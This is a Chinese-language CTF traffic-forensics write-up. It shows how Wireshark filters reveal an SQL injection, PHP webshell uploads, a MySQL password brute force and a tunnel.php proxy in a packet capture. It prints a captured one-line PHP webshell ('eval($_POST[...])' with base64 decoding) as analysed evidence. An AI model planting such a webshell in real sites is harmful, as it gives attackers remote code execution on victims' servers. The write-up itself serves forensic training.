1.题目要求:
1.黑客攻击的第一个受害主机的网卡IP地址
2.黑客对URL的哪一个参数实施了SQL注入
3.第一个受害主机网站数据库的表前缀(加上下划线例如abc)
4.第一个受害主机网站数据库的名字
看到题目SQL注入,那就首先过滤http和https协议
过滤后可以看到两个出现次数比较多的ip,202.1.1.2和192.168.1.8,可以看到202.1.1.2对192.168.1.8进行了攻击
打开一个看一下请求内容
发现了get里面有urlcode编码过的内容,拿下来解码看一下
明显的sql注入行为,那么受害者就是192.168.1.8了
至于为什么不是202.1.1.2,原因是公网和私网的命名规则,所以192.168.1.8是私网,202.1.1.2是经过nat转换的公网地址,所以判断出202.1.1.2是攻击方
2.题目要求:
1.黑客第一次获得的php木马的密码是什么
2.黑客第二次上传php木马是什么时间
3.第二次上传的木马通过HTTP协议中的哪个头传递数据
题目要求php木马的密码,首先我们要知道php一句话木马一般都是POST请求
所以我们直接过滤POST请求,发现这个IP请求了一个名为kkkaaa.php的php文件,很可疑
正常文件不会以此命名的, 打开数据包看一下,发现了这个字段
Form item: "zzz" = "@eval(base64_decode($_POST[z0]));"
这里他上传的一句话木马应该是
<?php eval($_POST['zzz']);?>
然后又将eval(base64_decode($_POST[z0]));传入zzz参数,目的是将z0传入的数据进行base64的解码,此时z0传入base64编码后的数据,便可以执行恶意代码
第二题是第二次上传木马的时间
此处流量长度较长,比较异常
第一个包毋庸置疑是会比其他包长一点,但是第四个包很奇怪,和其他包相比长了150多字节左右
追踪tcp流
这段代码很明显是一段混淆过的代码,但是没关系,看j和N这两个变量就行了
这是利用的create_function这个函数制作的木马,现在已经找到木马,就是这个包
直接看这个包的上传时间
看到时间为17:20:44.248365
3.题目要求:
1.内网主机的mysql用户名和请求连接的密码hash是多少
2.php代理第一次被使用时最先连接了哪个IP地址
筛选:tcp contains "mysql" && mysql(找tcp中包含mysql且使用mysql协议的包)
发现大量login,证明是爆破行为,内网受害主机位192.168.2.20
既然破解成功了,那就肯定是最后一个包,直接看最后一个包:
得到用户名和密码的hash
然后过滤http请求,发现名为tunnel.php的php文件
点开可以清晰地看到php代理第一次连接的IP地址是4.2.2.2,端口53
wireshark的过滤器官方文档6.4. 构建显示过滤器表达式 (wireshark.org)